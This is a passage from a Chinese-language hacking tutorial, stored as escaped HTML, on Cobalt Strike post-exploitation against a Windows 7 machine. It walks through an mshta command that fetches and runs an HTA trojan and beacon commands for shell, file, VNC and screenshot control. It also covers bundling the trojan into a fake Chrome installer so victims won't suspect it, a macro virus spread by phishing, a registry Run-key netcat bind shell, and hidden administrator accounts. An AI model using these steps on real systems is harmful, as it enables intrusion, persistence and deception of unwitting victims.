\u5f00\u542f\u7684\u6240\u6709web\u670d\u52a1<\/li>\n<li>Clone site\u514b\u9686\u67d0\u7f51\u7ad9<\/li>\n<li>Host File \u5728 Team Serve \u7684\u67d0\u7aef\u53e3\u63d0\u4f9bWeb\u4ee5\u4f9b\u4e0b\u8f7d\u67d0\u6587\u4ef6<\/li>\n<li>Scripted Web Delivery \u4e3a payload \u63d0\u4f9bweb\u670d\u52a1\u4ee5\u4fbf\u4e8e\u4e0b\u8f7d\u548c\u6267\u884c<\/li>\n<li>System Profiler \u7528\u6765\u83b7\u53d6\u7cfb\u7edf\u4fe1\u606f&#xff1a;\u7cfb\u7edf\u7248\u672c\u3001Flash\u7248\u672c\u3001\u6d4f\u89c8\u5668\u7248\u672c\u7b49<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070000-69843ff0d090d.png\" alt=\"\" \/><\/p>\n<h5>\u4e8c\u3001\u653b\u51fb\u76ee\u6807\u673a\u5668 &#8211; HTML Application&#xff08;\u751f\u6210hta HTML\u5e94\u7528\u7a0b\u5e8f&#xff09;<\/h5>\n<h6>1&#xff09;\u751f\u6210hta\u6587\u4ef6 &#xff08;\u6728\u9a6c\u6587\u4ef6&#xff09;<\/h6>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070000-69843ff0e7c13.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070001-69843ff124726.png\" alt=\"\" \/><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070001-69843ff17ade5.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05kesgajw5by5.png\" alt=\"\" \/><\/p>\n<p>    **\u6700\u540e\u5728\u684c\u9762\u4e0a\u5c31\u80fd\u627e\u5230\u6728\u9a6c\u7a0b\u5e8f**<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05vo2tqdqrpof.png\" alt=\"\" \/><\/p>\n<h6>2&#xff09;\u63d0\u4f9b\u7aef\u53e3\u4e0b\u8f7d\u6587\u4ef6&#xff08;\u7ed9\u53d7\u5bb3\u8005\u63d0\u4f9b\u4e00\u4e2a\u63d0\u4f9b\u4e00\u4e2a\u7aef\u53e3&#xff0c;\u8ba9\u4ed6\u53ef\u4ee5\u4e0b\u8f7d\u6211\u4eec\u7684\u6728\u9a6c\u6587\u4ef6&#xff09;<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05cnvdkq1as0i.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05xnksv4vnff5.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05tdpicusxmou.png\" alt=\"\" \/><\/p>\n<p>http:\/\/192.168.0.104:10067\/download\/file.ext<\/p>\n<h6>3&#xff09;\u9776\u673a\u6267\u884c\u8fdc\u7a0b\u547d\u4ee4<\/h6>\n<p>\u6211\u8fd9\u91cc\u5f00\u4e86\u4e00\u53f0win7\u865a\u62df\u673a&#xff08;\u53d7\u5bb3\u8005&#xff09;\u8bbf\u95ee\u6728\u9a6c\u8fde\u63a5&#xff08;\u6ce8\u610f&#xff1a;win7\u865a\u62df\u673a\u8981\u548ckali\u8fde\u63a5\u540c\u4e00\u4e2a\u7f51\u7edc&#xff0c;\u4e0d\u7136\u4e24\u8005\u65e0\u6cd5\u901a\u4fe1&#xff09;<\/p>\n<p>\u6d4b\u8bd5win7\u548ckali\u662f\u5426\u53ef\u4ee5\u901a\u4fe1&#xff0c;\u4f7f\u7528\u547d\u4ee4&#xff1a;ping \u76ee\u6807IP\u5730\u5740&#xff08;kali\u7684ip&#xff09;<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ijj0f4kng22.png\" alt=\"\" \/><\/p>\n<p>\u5728win7\u7684\u865a\u62df\u673a\u7684cmd\u4e2d\u8f93\u5165\u547d\u4ee4&#xff1a;<\/p>\n<p># \u8bbf\u95eekali\u7cfb\u7edf\u751f\u6210\u7684\u6728\u9a6c\u6587\u4ef6&#xff0c;\u8fd9\u662f\u6700\u57fa\u672c\u7684\u4e0a\u7ebf\u65b9\u5f0f<br \/>\nmshta http:\/\/192.168.0.104:10067\/download\/file.ext<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05nxsb0qcr5k3.png\" alt=\"\" \/><img decoding=\"async\" src=\"2026-02-05xpdqqyrss5r.png\" alt=\"\" \/><\/p>\n<h5>\u4e09\u3001\u653b\u51fb\u76ee\u6807\u673a\u5668 &#8211; \u64cd\u63a7\u76ee\u6807\u673a\u5668<\/h5>\n<p>\u5f53\u6709\u76ee\u6807\u4e3b\u673a\u4ee5\u4efb\u4f55\u65b9\u5f0f\u8fd0\u884c\u4e86\u751f\u6210\u7684\u88ab\u63a7\u7aef&#xff0c;\u51fa\u73b0\u5728\u4e3b\u673a\u5217\u8868\u3002<\/p>\n<p>\u9009\u4e2d\u8981\u64cd\u4f5c\u7684\u76ee\u6807\u4e3b\u673a -&gt; \u9f20\u6807\u53f3\u952e -&gt; \u8fdb\u5165beacon&#xff08;\u4ea4\u4e92\u547d\u4ee4\u754c\u9762&#xff09;&#xff0c;\u5728\u6b64\u4f7f\u7528 Beacon Commands\u5bf9\u76ee\u6807\u4e3b\u673a\u6267\u884c\u5404\u79cd\u64cd\u4f5c\u3002<\/p>\n<h6>1&#xff09;\u83b7\u53d6\u5230\u5bf9\u65b9\u7684cmd\u6743\u9650<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05e3lofm1rcft.png\" alt=\"\" \/><\/p>\n<p>      **sleep 0       # \u8bbe\u7f6ebeacon\u5ef6\u8fdf\u65f6\u95f4\u4e3a0\u6beb\u79d2&#xff0c;\u9ed8\u8ba4\u662f60\u79d2\u4e5f\u5c31\u662f\u8bf460\u79d2\u547d\u4ee4\u624d\u4f1a\u6210\u6548\u4e00\u6b21**<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05pawjnxyemfm.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05w1k3frqykcf.png\" alt=\"\" \/><\/p>\n<p>     **\u4e5f\u53ef\u4ee5\u4f7f\u7528\u56fe\u5f62\u754c\u9762\u7684\u65b9\u5f0f\u66f4\u6539\u5ef6\u8fdf\u65f6\u95f4**<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05qngjqphzaoh.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-0521myugkzfkm.png\" alt=\"\" \/><\/p>\n<p>    **shell ipconfig**   **#  \u6267\u884cshell\u4ee4&#xff0c;\u5982\u679c\u662f\u5728windows\u7cfb\u7edf\u7684\u547d\u4ee4\u884c\u4e2d\u6211\u4eec\u8981\u67e5\u770bIP\u914d\u7f6e\u76f4\u63a5ipconfig   \u5c31\u53ef\u4ee5\u4e86&#xff0c;\u4f46\u662f\u5728\u8fd9\u91cc\u4e0d\u884c&#xff0c;\u8981\u5728\u524d\u9762\u52a0\u4e0ashell**<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05tuf1yfg3dh2.png\" alt=\"\" \/><\/p>\n<h6>2&#xff09;\u4f7f\u7528\u6587\u4ef6\u7ba1\u7406\u5668<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05re2ezrzuqrn.png\" alt=\"\" \/><\/p>\n<h6><img decoding=\"async\" src=\"2026-02-05zbe33ftqqmd.png\" alt=\"\" \/><\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05x5beovm2ma5.png\" alt=\"\" \/><\/p>\n<h6>3&#xff09;\u83b7\u53d6\u76ee\u6807\u7684\u8fdc\u7a0b\u684c\u9762&#xff08;VNC&#xff09;<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-052aax0wjmp1x.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05axx2nnt4nay.png\" alt=\"\" \/><\/p>\n<h6>4&#xff09;\u83b7\u53d6\u76ee\u6807\u7684\u8fdb\u7a0b<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-050tcvqgjtu2a.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05y0kj2e2cuek.png\" alt=\"\" \/><\/p>\n<h6>5&#xff09;\u5c4f\u5e55\u622a\u56fe<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05wuv50h1qgt1.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-054uqdhkgj40q.png\" alt=\"\" \/><\/p>\n<h5>\u56db\u3001\u751f\u6210\u540e\u95e8\u6728\u9a6c &#8211; Windows Executable&#xff08;Windows\u53ef\u6267\u884c\u6587\u4ef6&#xff09;<\/h5>\n<h6>1&#xff09;\u751f\u6210\u53ef\u6267\u884c\u6587\u4ef6<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05nmaeiketvhj.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-052k4cikcvxun.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05dt1iqdswexw.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-055unkvedvcfo.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05dxbdchouh5k.png\" alt=\"\" \/><\/p>\n<h6>2. \u6346\u7ed1\u8f6f\u4ef6<\/h6>\n<p>    \u8fd9\u4e2a\u6728\u9a6c\u6587\u4ef6\u522b\u4eba\u4e00\u770b\u90fd\u4e0d\u77e5\u9053\u8fd9\u662f\u5565&#xff1f;\u90fd\u4e0d\u4f1a\u4e0b\u8f7d\u8fd0\u884c&#xff0c;\u6240\u4ee5\u6211\u4eec\u8981\u628a\u6728\u9a6c\u6587\u4ef6\u548c\u5176\u5b83\u8f6f\u4ef6\u7684\u5b89\u88c5\u5305\u6346\u7ed1\u8d77\u6765&#xff0c;\u8ba9\u4ed6\u4eec\u5b89\u88c5\u5176\u5b83\u8f6f\u4ef6\u65f6\u5c31\u81ea\u52a8\u5b89\u88c5\u6211\u4eec\u7684\u6728\u9a6c<\/p>\n<p>\u7528\u5230\u7684\u8f6f\u4ef6<\/p>\n<ul>\n<li>\u538b\u7f29\u8f6f\u4ef6&#xff1a;WinRAR_5<\/li>\n<li>\u8f6f\u4ef6\u56fe\u6807&#xff1a;Restorator<\/li>\n<li>\u518d\u51c6\u5907\u4e00\u4e2a\u8c37\u6b4c\u7684\u5b89\u88c5\u7a0b\u5e8f&#xff08;\u5728\u7f51\u4e0a\u968f\u4fbf\u641c\u4e00\u4e0b\u5c31\u80fd\u4e0b\u8f7d&#xff09;&#xff0c;\u7528\u6765\u6346\u7ed1\u6728\u9a6c<\/li>\n<\/ul>\n<p>\u521b\u5efa\u81ea\u89e3\u538b\u6587\u4ef6&#xff08;\u628a\u6728\u9a6c\u6587\u4ef6\u6346\u7ed1\u90fd\u8c37\u6b4c\u7684\u5b89\u88c5\u7a0b\u5e8f\u4e0a&#xff09;<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05iagteu0r51c.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ft0od4r4kxq.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05cfbbu54ehm1.png\" alt=\"\" \/><\/p>\n<p>\u89e3\u538b\u8def\u5f84\u53ef\u4ee5\u653e\u5230\u516c\u7528&#xff1a;C:\\\\Users\\\\Public<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05xdscfds3jve.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05rpsrztq5nq2.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05g203ggo2k4u.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05caadp35tltf.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05afjeuvvmggw.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05eayl40qaxfv.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05o1muewt2fsy.png\" alt=\"\" \/><\/p>\n<p>\u73b0\u5728\u8f6f\u4ef6\u7684\u56fe\u6807\u548c\u8c37\u6b4c\u7684\u4e0d\u4e00\u6837\u6211\u4eec\u6539\u4e00\u4e0b\u56fe\u6807&#xff0c;\u6253\u5f00Restorator<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05hoalml454ef.png\" alt=\"\" \/><img decoding=\"async\" src=\"2026-02-05uiix5dmqnkm.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-050kso4tspwhg.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f&#xff0c;\u6346\u7ed1\u8f6f\u4ef6<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05kmcednuxtx5.png\" alt=\"\" \/><\/p>\n<p>\u6700\u540e\u53d7\u5bb3\u8005\u8fd0\u884c\u6211\u4eec\u5236\u4f5c\u7684\u8c37\u6b4c\u5b89\u88c5\u7a0b\u5e8f&#xff0c;\u6211\u4eec\u5728kali\u5c31\u80fd\u76d1\u542c\u5230<\/p>\n<p>\u8fd0\u884c\u6211\u4eec\u5236\u4f5c\u7684\u7a0b\u5e8f\u4e00\u6837\u662f\u53ef\u4ee5\u5b89\u88c5\u8c37\u6b4c&#xff0c;\u6240\u4ee5\u4e00\u822c\u4eba\u662f\u4e0d\u4f1a\u6000\u7591\u7684<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05vybp5iuapic.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-0534vzvlnmman.png\" alt=\"\" \/><\/p>\n<p>kali\u8fd9\u8fb9\u5c31\u80fd\u76d1\u542c\u5230<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05xypwz404gdn.png\" alt=\"\" \/><\/p>\n<h6>3. \u4e0a\u4f20\u81f3\u76ee\u6807\u673a\u5668<\/h6>\n<ul>\n<li>\u901a\u8fc7 webshell\u4e0a\u4f20\u3001\u8fd0\u884c<\/li>\n<li>\u901a\u8fc7\u4e92\u8054\u7f51\u4f20\u64ad\u3001\u9493\u9c7c<\/li>\n<\/ul>\n<h5>\u4e94\u3001\u751f\u6210\u540e\u95e8\u6728\u9a6c &#8211; Office \u5b8f\u75c5\u6bd2<\/h5>\n<h6>1. \u4e3a\u6587\u6863\u6dfb\u52a0\u5b8f<\/h6>\n<li>\u6253\u5f00\u60a8\u8981\u6dfb\u52a0\u5b8f\u7684 Office \u6587\u4ef6&#xff08;\u4f8b\u5982 test.docx&#xff09;\u3002<\/li>\n<li>\u5728\u83dc\u5355\u680f\u4e2d\u9009\u62e9 \u201c\u89c6\u56fe\u201d\u3002<\/li>\n<li>\u5728\u4e0b\u62c9\u83dc\u5355\u4e2d\u9009\u62e9 \u201c\u5b8f\u201d\u3002<\/li>\n<li>\u5728\u5f39\u51fa\u7684\u83dc\u5355\u4e2d\u9009\u62e9 \u201c\u67e5\u770b\u5b8f\u201d\u3002<\/li>\n<li>\u5728\u5f39\u51fa\u7684\u5bf9\u8bdd\u6846\u4e2d&#xff0c;\u9009\u62e9\u5b8f\u7684\u4f4d\u7f6e\u4e3a \u201c\u5f53\u524d\u6587\u6863\u201d\u3002<\/li>\n<li>\u5728 \u201c\u5b8f\u540d\u201d \u8f93\u5165\u6846\u4e2d&#xff0c;\u8f93\u5165\u60a8\u60f3\u8981\u4e3a\u5b8f\u547d\u540d\u7684\u540d\u79f0\u3002<\/li>\n<li>\u70b9\u51fb \u201c\u521b\u5efa\u201d \u6309\u94ae\u3002<\/li>\n<li>\u5c06\u60a8\u7684\u5b8f\u4ee3\u7801\u590d\u5236\u5e76\u7c98\u8d34\u5230\u5b8f\u547d\u4ee4\u5904\u3002<\/li>\n<li>\u5728\u4fdd\u5b58\u65f6&#xff0c;\u9009\u62e9 \u201c\u5426\u201d \u5e76\u5c06\u6587\u4ef6\u53e6\u5b58\u4e3a .docm \u683c\u5f0f\u3002<\/li>\n<h6>2. \u4e0a\u4f20\u81f3\u76ee\u6807\u673a\u5668<\/h6>\n<ul>\n<li>\u901a\u8fc7\u4e92\u8054\u7f51\u90ae\u7bb1\u3001\u793e\u4ea4\u5a92\u4f53\u3001\u8bba\u575b\u4f20\u63cf<\/li>\n<li>\u8bf1\u5bfc\u70b9\u51fb<\/li>\n<\/ul>\n<h6>\u5b9e\u73b0&#xff1a;<\/h6>\n<h6>1&#xff09;\u521b\u5efaOffice \u5b8f\u75c5\u6bd2 \u4ee3\u7801<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05zsduqvt20vs.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05xn0seaezxm3.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-054csqwkxnyqi.png\" alt=\"\" \/><\/p>\n<h6>2&#xff09;\u521b\u5efa\u4e00\u4e2adocx\u6587\u6863&#xff0c;\u5728\u684c\u9762\u65b0\u5efaDOCX \u6587\u6863\u5e76\u6253\u5f00&#xff0c;\u524d\u63d0\u4f60\u7535\u8111\u6ca1\u6709\u5b89\u88c5WPS\u200b\u200b\u200b\u200b\u200b\u7136\u540e\u5b89\u88c5WPS\u7684VB\u5b8f\u63d2\u4ef6&#xff0c;\u5b89\u88c5\u6b65\u9aa4\u4e00\u8def\u4e0b\u4e00\u6b65&#xff08;\u53ef\u4ee5\u9009\u62e9\u5b89\u88c5\u8def\u5f84&#xff09;<\/h6>\n<h6><img decoding=\"async\" src=\"2026-02-05lozt3oz4h5y.png\" alt=\"\" \/><\/h6>\n<p><img decoding=\"async\" src=\"2026-02-05pdani13mrkm.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05l2wrf0rux5m.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05jttg4wfhcqy.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05q15lyyph3l1.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05itlury2zf3b.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-054srd3xs3fn3.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05jditm1u3y5o.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ktfweqqccrk.png\" alt=\"\" \/><\/p>\n<p>\u5199\u4e00\u4e9b\u5185\u5bb9&#xff0c;\u6700\u540e\u4fdd\u5b58\u6587\u4ef6<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ljwgadq3bkm.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05f02dtiz2wb0.png\" alt=\"\" \/><img decoding=\"async\" src=\"2026-02-05wc15ghpfswu.png\" alt=\"\" \/><\/p>\n<h5>\u516d\u3001\u653b\u51fb\u5b8c\u6210\u540e\u7684\u64cd\u4f5c<\/h5>\n<ul>\n<li>\u5f00\u673a\u81ea\u542f\u52a8<\/li>\n<li>\u6bcf\u6b21\u542f\u52a8\u767b\u5f55\u65f6\u90fd\u4f1a\u6309\u987a\u5e8f\u81ea\u52a8\u6267\u884c<\/li>\n<\/ul>\n<p>\u5728Windows\u64cd\u4f5c\u7cfb\u7edf\u4e2d&#xff0c;\u5f53\u8ba1\u7b97\u673a\u542f\u52a8\u65f6&#xff0c;\u4f1a\u81ea\u52a8\u8fd0\u884c\u6ce8\u518c\u8868\u4e2d\u7684\u67d0\u4e9b\u952e\u503c\u5bf9\u4ee5\u542f\u52a8\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1\u3002\u5728\u60a8\u63d0\u4f9b\u7684\u793a\u4f8b\u4e2d&#xff0c;\u56db\u4e2a\u952e\u90fd\u662f\u7528\u4e8e\u63a7\u5236\u5728\u542f\u52a8\u65f6\u5e94\u8be5\u8fd0\u884c\u54ea\u4e9b\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1\u3002<\/p>\n<p># \u8be5\u952e\u5305\u542b\u4e86\u5f53\u524d\u7528\u6237\u767b\u5f55\u5230Windows\u65f6\u9700\u8981\u542f\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1<br \/>\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\Currentversion\\\\Run<\/p>\n<p># \u8be5\u952e\u5305\u542b\u4e86\u8ba1\u7b97\u673a\u4e0a\u4efb\u4f55\u7528\u6237\u767b\u5f55\u65f6\u9700\u8981\u542f\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1<br \/>\nHKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\windows\\\\Currentversion\\\\Run<\/p>\n<p># \u8be5\u952e\u5305\u542b\u4e86\u5f53\u524d\u7528\u6237\u767b\u5f55\u5230Windows\u65f6\u9700\u8981\u5728\u8d44\u6e90\u7ba1\u7406\u5668\u542f\u52a8\u65f6\u8fd0\u884c\u7684\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1<br \/>\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\Currentversion\\\\Policies\\\\Explorer\\\\Run<\/p>\n<p># \u8be5\u952e\u5305\u542b\u4e86\u8ba1\u7b97\u673a\u4e0a\u4efb\u4f55\u7528\u6237\u767b\u5f55\u65f6\u9700\u8981\u5728\u8d44\u6e90\u7ba1\u7406\u5668\u542f\u52a8\u65f6\u8fd0\u884c\u7684\u5e94\u7528\u7a0b\u5e8f\u6216\u670d\u52a1<br \/>\nHKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Currentversion\\\\Policies\\\\Explorer\\\\Run<\/p>\n<h6>\u6269\u5c55\u77e5\u8bc6&#xff1a;<\/h6>\n<p>\u6ce8\u518c\u8868\u7684 HKEY_LOCAL_MACHINE \u548c HKEY_CURRENT_USER \u952e\u7684\u533a\u522b&#xff1a;<\/p>\n<p>HKEY_LOCAL_MACHINE\u952e\u5b58\u50a8\u8ba1\u7b97\u673a\u4e0a\u6240\u6709\u7528\u6237\u7684\u914d\u7f6e\u4fe1\u606f&#xff0c;\u800cHKEY_CURRENT_USER\u952e\u4ec5\u5b58\u50a8\u5f53\u524d\u767b\u5f55\u7528\u6237\u7684\u914d\u7f6e\u4fe1\u606f\u3002&#xff08;\u7b80\u5355\u7406\u89e3&#xff1a;\u524d\u8005\u5bf9\u6240\u6709\u7528\u6237\u6709\u6548 &#xff0c;\u540e\u8005\u5bf9\u53ea\u5bf9\u5f53\u524d\u7528\u6237\u6709\u6548&#xff09;<\/p>\n<h6>1&#xff09;\u4e0a\u4f20nc&#xff08;\u6728\u9a6c&#xff09;<\/h6>\n<p>upload nc.exe C:\\\\windows\\\\system32<\/p>\n<h6>2&#xff09;\u67e5\u770b\u81ea\u542f\u52a8\u6ce8\u518c\u8868\u9879&#xff1a;<\/h6>\n<p>reg enumkey -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run<\/p>\n<p>\u8be5\u547d\u4ee4\u7528\u4e8e\u679a\u4e3e\u6ce8\u518c\u8868\u8def\u5f84HKEY_LOCAL_MACHINE\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run\u4e0b\u7684\u6240\u6709\u5b50\u952e\u3002\u5b83\u5c06\u5217\u51fa\u5728\u7cfb\u7edf\u542f\u52a8\u65f6\u81ea\u52a8\u8fd0\u884c\u7684\u7a0b\u5e8f\u7684\u76f8\u5173\u4fe1\u606f\u3002\u8bf7\u6ce8\u610f&#xff0c;\u8fd9\u662f\u4e00\u4e2a\u53ea\u8bfb\u64cd\u4f5c&#xff0c;\u4e0d\u4f1a\u5bf9\u6ce8\u518c\u8868\u8fdb\u884c\u4efb\u4f55\u4fee\u6539\u3002<\/p>\n<h6>3&#xff09;\u6dfb\u52a0\u6ce8\u518c\u8868&#xff0c;\u5f00\u673a\u542f\u52a8nc\u5e76\u5f00\u542f\u76d1\u542c<\/h6>\n<p>reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v nc -d &#034;C:\\\\windows\\\\system32\\\\nc64.exe -Ldp 5555 -e cmd.exe&#034;<\/p>\n<p>\u8bf7\u6ce8\u610f&#xff0c;\u8fd9\u662f\u4e00\u6761Windows\u6ce8\u518c\u8868\u547d\u4ee4&#xff0c;\u7528\u4e8e\u8bbe\u7f6e\u5728\u7cfb\u7edf\u542f\u52a8\u65f6\u81ea\u52a8\u8fd0\u884c\u7684\u7a0b\u5e8f\u3002\u8be5\u547d\u4ee4\u5c06\u5728\u6ce8\u518c\u8868\u8def\u5f84HKEY_LOCAL_MACHINE\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\u4e0b\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a&#034;nc&#034;\u7684\u503c&#xff0c;\u5e76\u5c06\u5176\u6570\u636e\u8bbe\u7f6e\u4e3aC:\\\\windows\\\\system32\\\\nc64.exe -Ldp 5555 -e cmd.exe\u3002<\/p>\n<h6>4&#xff09;\u67e5\u770b\u6ce8\u518c\u8868\u6307\u5b9a\u9879\u503c<\/h6>\n<p>reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v nc<\/p>\n<p>\u8bf7\u6ce8\u610f&#xff0c;\u8fd9\u662f\u4e00\u4e2a\u7528\u4e8e\u67e5\u8be2\u6ce8\u518c\u8868\u7684\u547d\u4ee4\u3002\u5b83\u5c06\u5728\u6ce8\u518c\u8868\u8def\u5f84HKEY_LOCAL_MACHINE\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run\u4e0b\u67e5\u8be2\u540d\u4e3a&#034;nc&#034;\u7684\u503c\u3002<\/p>\n<h6>5&#xff09;\u9690\u85cf\u8d26\u6237<\/h6>\n<p>\u9690\u85cf\u7528\u6237&#xff1a;<\/p>\n<p>net user admin$ 123456 \/add &amp;&amp; net localgroup administrators admin$ \/add <\/p>\n<p>\u8fd9\u4e2a\u547d\u4ee4\u5b9e\u9645\u4e0a\u662f\u4e24\u4e2a\u547d\u4ee4\u7684\u7ec4\u5408&#xff0c;\u7528\u4e86&#034;&amp;&amp;&#034;\u8fd0\u7b97\u7b26\u5c06\u5b83\u4eec\u8fde\u63a5\u8d77\u6765\u3002\u4e0b\u9762\u662f\u6bcf\u4e2a\u547d\u4ee4\u7684\u4f5c\u7528&#xff1a;<\/p>\n<li>\n<p>net user admin$ 123456 \/add&#xff1a;\u8fd9\u4e2a\u547d\u4ee4\u4f7f\u7528&#034;net user&#034;\u547d\u4ee4\u521b\u5efa\u4e86\u4e00\u4e2a\u540d\u4e3a&#034;admin$\u201c\u7684\u672c\u5730\u7528\u6237&#xff0c;\u5e76\u5c06\u5bc6\u7801\u8bbe\u7f6e\u4e3a&#034;123456\u201d\u3002<\/p>\n<\/li>\n<li>\n<p>net localgroup administrators admin$ \/add&#xff1a;\u8fd9\u4e2a\u547d\u4ee4\u4f7f\u7528&#034;net localgroup&#034;\u547d\u4ee4\u5c06&#034;admin$&#034;\u7528\u6237\u6dfb\u52a0\u5230&#034;administrators&#034;\u672c\u5730\u7ec4\u4e2d&#xff0c;\u4ece\u800c\u5c06\u8be5\u7528\u6237\u63d0\u5347\u4e3a\u7ba1\u7406\u5458\u6743\u9650\u3002<\/p>\n<\/li>\n<p>\u56e0\u6b64&#xff0c;\u8fd9\u4e2a\u547d\u4ee4\u7684\u4f5c\u7528\u662f\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a&#034;admin$&#034;\u7684\u672c\u5730\u7528\u6237&#xff0c;\u5e76\u5c06\u5176\u63d0\u5347\u4e3a\u7ba1\u7406\u5458\u6743\u9650\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f&#xff0c;\u8fd9\u79cd\u505a\u6cd5\u53ef\u80fd\u4f1a\u589e\u52a0\u7cfb\u7edf\u5b89\u5168\u98ce\u9669&#xff0c;\u56e0\u4e3a\u8fd9\u4e2a\u8d26\u6237\u662f\u4e00\u4e2a\u9690\u85cf\u8d26\u6237&#xff0c;\u5982\u679c\u88ab\u9ed1\u5ba2\u653b\u51fb\u6216\u8005\u88ab\u6076\u610f\u8f6f\u4ef6\u5229\u7528&#xff0c;\u53ef\u80fd\u4f1a\u7ed9\u7cfb\u7edf\u9020\u6210\u5b89\u5168\u9690\u60a3\u3002\u5efa\u8bae\u60a8\u5728\u8fdb\u884c\u6b64\u7c7b\u64cd\u4f5c\u65f6\u8981\u8c28\u614e&#xff0c;\u53ea\u5728\u5fc5\u8981\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002<\/p>\n<h6>6&#xff09;\u6fc0\u6d3b Guest \u7528\u6237&#xff1a;&#xff08;\u6765\u5bbe\u7528\u6237\u9ed8\u8ba4\u662f\u6ca1\u6709\u6fc0\u6d3b\u7684&#xff09;<\/h6>\n<p>net user guest Admin&#064;hacker &amp;&amp; net localgroup administrators guest \/add<br \/>\nnet user guest \/active:yes<\/p>\n<p>\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7684\u4f5c\u7528\u5982\u4e0b&#xff1a;<\/p>\n<li>\n<p>net user guest Admin&#064;hacker &amp;&amp; net localgroup administrators guest 